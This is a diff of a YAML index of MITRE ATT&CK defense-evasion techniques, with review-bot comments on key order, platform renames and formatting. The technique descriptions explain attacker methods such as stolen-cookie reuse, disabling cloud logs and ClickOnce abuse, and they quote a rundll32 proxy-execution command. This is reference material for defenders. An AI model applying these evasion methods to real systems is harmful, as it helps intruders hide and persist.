- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -12328,7 +12469,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1027.003:
@@ -12384,11 +12524,10 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -12412,11 +12551,10 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
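Review bot: the platform list for Web Session Cookie drops `Office 365` and `Google Workspace` and gains `Office Suite`, and the same substitution is made for T1656, T1562.008 and T1556.009 further down. Anything that derives per-platform index files or filters from these strings under the old names will silently stop matching, so the platform-to-index mapping (and any documentation listing accepted platform names) needs the same rename in this change, or an alias from the old names to the new one. The version bump `'1.3'` -> `'1.4'` alongside a platform-only edit is consistent.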
@@ -12441,9 +12579,8 @@ defense-evasion:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -12523,7 +12660,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.009:
technique:
@@ -12557,7 +12693,7 @@ defense-evasion:
- source_name: LOLBAS Regasm
url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:55:48.725Z'
name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
description: |-
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -12584,8 +12720,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.009
atomic_tests: []
T1553.004:
@@ -12680,7 +12814,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.004
atomic_tests:
- name: Install root CA on macOS
@@ -12719,43 +12852,20 @@ defense-evasion:
elevation_required: true
T1027.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
- type: attack-pattern
- created: '2020-03-16T15:30:57.711Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1027.004
- url: https://attack.mitre.org/techniques/T1027/004
- - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
- in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
- campaign. Retrieved November 29, 2018.'
- url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
- source_name: ClearSky MuddyWater Nov 2018
- - source_name: TrendMicro WindowsAppMac
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
- description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
- Info Stealer and Adware. Retrieved April 25, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-03T17:43:14.766Z'
name: 'Obfuscated Files or Information: Compile After Delivery'
description: |-
- Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+ Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor the execution file paths and command-line arguments
for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
suspicious behavior to reduce false positives from normal user and administrator
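Review bot: most of this hunk is key reordering rather than content: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the whole `external_references` block are deleted from the top of T1027.004 only to be re-emitted at the bottom in the next two hunks. The actual change is small (the description now names `ilasm.exe` with `(Citation: ATTACK IQ)`, and `Liran Ravich, CardinalOps` joins the contributors), but a reviewer has to reconcile the removed references here against the re-added ones below to confirm nothing was lost. Emitting keys in a fixed order in the generator (or preserving upstream order) would turn this into a few-line diff next time.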
@@ -12764,9 +12874,14 @@ defense-evasion:
and execution frameworks like Mono and determine if they have a legitimate
purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
should only be used in specific and limited cases, like for software development.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Creation'
@@ -12778,12 +12893,35 @@ defense-evasion:
- Anti-virus
- Binary Analysis
- Static File Analysis
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Compiler software (either native to the system or delivered by the adversary)
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+ created: '2020-03-16T15:30:57.711Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/004
+ external_id: T1027.004
+ - source_name: ClearSky MuddyWater Nov 2018
+ description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+ in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+ campaign. Retrieved November 29, 2018.'
+ url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+ - source_name: ATTACK IQ
+ description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+ (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+ Binaries. Retrieved July 15, 2024.'
+ url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+ - source_name: TrendMicro WindowsAppMac
+ description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+ Info Stealer and Adware. Retrieved April 25, 2019.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1027.004
atomic_tests:
- name: C compile
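Review bot: `x_mitre_permissions_required: - User` is dropped from T1027.004 here and not re-added, while T1134.005 and T1218.009 in this same diff keep their `x_mitre_permissions_required` lists, so the field's presence now depends on which upstream version an entry was last refreshed from; decide whether the index still exposes it and apply that uniformly. On the references themselves: `ClearSky MuddyWater Nov 2018` and `TrendMicro WindowsAppMac` come back with the same URLs, the new `ATTACK IQ` entry is defined, and `revoked: false` is added, so the `(Citation: ATTACK IQ)` reference in the updated description resolves and nothing from the removed block is missing. The description text `ilasm.exe(Citation: ATTACK IQ)` lacks a space before the citation and the unchanged `x_mitre_detection` still lists only `csc.exe` and GCC/MinGW; both are upstream wording, so only worth touching if the generator post-processes these fields.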
@@ -12923,7 +13061,7 @@ defense-evasion:
url: https://github.com/decalage2/oletools
description: decalage2. (2019, December 3). python-oletools. Retrieved September
18, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T14:02:07.944Z'
name: VBA Stomping
description: |-
Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -12949,12 +13087,10 @@ defense-evasion:
x_mitre_system_requirements:
- MS Office version specified in _VBA_PROJECT
stream must match
host
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -13044,7 +13180,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1127.001:
@@ -13102,12 +13237,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127.001
atomic_tests: []
T1656:
technique:
- modified: '2023-09-30T19:45:05.886Z'
+ modified: '2024-10-15T15:59:06.382Z'
name: Impersonation
description: "Adversaries may impersonate a trusted person or organization in
order to persuade and trick a target into performing some action on their
@@ -13149,10 +13283,9 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -13176,18 +13309,30 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.005:
technique:
- modified: '2023-10-02T22:17:54.968Z'
+ modified: '2024-09-25T14:15:26.322Z'
name: Modify Cloud Compute Configurations
- description: |-
- Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
- For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
- Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+ description: "Adversaries may modify settings that directly affect the size,
+ locations, and resources available to cloud compute infrastructure in order
+ to evade defenses. These settings may include service quotas, subscription
+ associations, tenant-wide policies, or other configurations that impact available
+ compute. Such modifications may allow adversaries to abuse the victim’s compute
+ resources to achieve their goals, potentially without affecting the execution
+ of running instances and/or revealing their activities to the victim.\n\nFor
+ example, cloud providers often limit customer usage of compute resources via
+ quotas. Customers may request adjustments to these quotas to support increased
+ computing needs, though these adjustments may require approval from the cloud
+ provider. Adversaries who compromise a cloud environment may similarly request
+ quota adjustments in order to support their activities, such as enabling additional
+ [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+ suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+ 2023) Adversaries may also increase allowed resource usage by modifying any
+ tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+ Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+ where cloud resources can be deployed, such as enabling [Unused/Unsupported
+ Cloud Regions](https://attack.mitre.org/techniques/T1535). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
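Review bot: the replacement description is emitted as a double-quoted scalar with `\n\n` escapes and hard wraps at arbitrary word boundaries, whereas the text it replaces used a `|-` block scalar, as nearby entries such as T1562.008 still do; keep block scalars for multi-line descriptions so paragraph breaks stay readable and the next upstream edit diffs cleanly. Note also the trailing space inside the closing quote on the last line (`Cloud Regions](https://attack.mitre.org/techniques/T1535). "`), which will survive into whatever renders this field. Content-wise the paragraph on Azure subscription creation and subscription hijacking is gone; its two references are removed in a later hunk and the remaining citations (`Microsoft Cryptojacking 2023`, `Microsoft Azure Policy`) are still defined, so no dangling `(Citation: ...)` is left, and the `x_mitre_version` bump to `'2.0'` matches a change of that size.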
@@ -13201,7 +13346,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
type: attack-pattern
@@ -13213,20 +13358,11 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578/005
external_id: T1578.005
- - source_name: Microsoft Subscription Hijacking 2022
- description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
- using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
- url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
- source_name: Microsoft Cryptojacking 2023
description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
Understanding and defending against cloud compute resource abuse. Retrieved
September 5, 2023.'
url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
- - source_name: Microsoft Peach Sandstorm 2023
- description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
- password spray campaigns enable intelligence collection at high-value targets.
- Retrieved September 18, 2023.
- url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
- source_name: Microsoft Azure Policy
description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
Retrieved September 5, 2023.
@@ -13235,11 +13371,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.008:
technique:
- modified: '2024-04-12T21:13:56.431Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Impair Defenses: Disable Cloud Logs'
description: |-
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -13248,6 +13383,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
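Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted between `kill_chain_phases` and `x_mitre_contributors` here, and `x_mitre_modified_by_ref` between `x_mitre_is_subtechnique` and `x_mitre_platforms` two hunks down, while the same two keys are deleted from their usual slot next to `object_marking_refs` at the end of the object. The other entries in this diff that carry these keys keep them at the end, so T1562.008 ends up with a different key order from its neighbours; harmless for YAML consumers, but it is the same nondeterministic ordering that bloats the T1027.004 hunks above, and a fixed key order in the generator would remove it.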
@@ -13257,6 +13393,7 @@ defense-evasion:
- Janantha Marasinghe
- Matt Snyder, VMware
- Joe Gumke, U.S. Bank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
for: StopLogging
and DeleteTrail
.(Citation: Stopping
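Review bot: the `x_mitre_detection` context lines closing this hunk read `for: StopLogging` / `and DeleteTrail` / `.(Citation: Stopping`, i.e. the inline markup around the API names appears to have been stripped and left bare line breaks inside the scalar; the VBA Stomping `x_mitre_system_requirements` above (`_VBA_PROJECT` / `stream must match` / `host`) shows the same artifact. Pre-existing rather than introduced here, but since the entry is being touched, either run these fields through the same markup-to-text step the descriptions get or record it as known upstream formatting so nobody files it as a regression.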
@@ -13268,13 +13405,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- - Office 365
- x_mitre_version: '2.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'User Account: User Account Modification'
@@ -13319,9 +13456,6 @@ defense-evasion:
url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.008
atomic_tests:
- name: AWS - Disable CloudTrail Logging Through Event Selectors using Stratus
@@ -13596,18 +13730,140 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.003
atomic_tests: []
+ T1127.002:
+ technique:
+ modified: '2024-10-17T18:50:41.474Z'
+ name: ClickOnce
+ description: |-
+ Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+ Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+ ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+ Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+ Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Wirapong Petshagun
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Metadata'
+ - 'Module: Module Load'
+ x_mitre_system_requirements:
+ - ".NET Framework"
+ type: attack-pattern
+ id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+ created: '2024-09-09T14:39:28.637Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1127/002
+ external_id: T1127.002
+ - source_name: LOLBAS /Dfsvc.exe
+ description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+ - source_name: Microsoft Learn ClickOnce
+ description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+ Retrieved September 9, 2024.
+ url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+ - source_name: SpectorOps Medium ClickOnce
+ description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+ (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+ url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+ - source_name: NetSPI ClickOnce
+ description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+ Love Story. Retrieved September 9, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+ - source_name: Burke/CISA ClickOnce Paper
+ description: William J. Burke IV. (n.d.). Appref-ms Abuse for Code Execution
+ & C2. Retrieved September 9, 2024.
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+ - source_name: Burke/CISA ClickOnce BlackHat
+ description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+ IN: When .appref-ms abuse is operating as intended. Retrieved September
+ 9, 2024.'
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1070.010:
+ technique:
+ modified: '2024-10-13T15:48:46.391Z'
+ name: Relocate Malware
+ description: |-
+ Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+ Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+ Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Matt Anderson, @nosecurething, Huntress
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+ created: '2024-05-31T11:07:57.406Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/010
+ external_id: T1070.010
+ - source_name: Latrodectus APR 2024
+ description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+ (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+ 31, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+ - source_name: DFIR Report Trickbot June 2023
+ description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+ Retrieved May 31, 2024.
+ url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
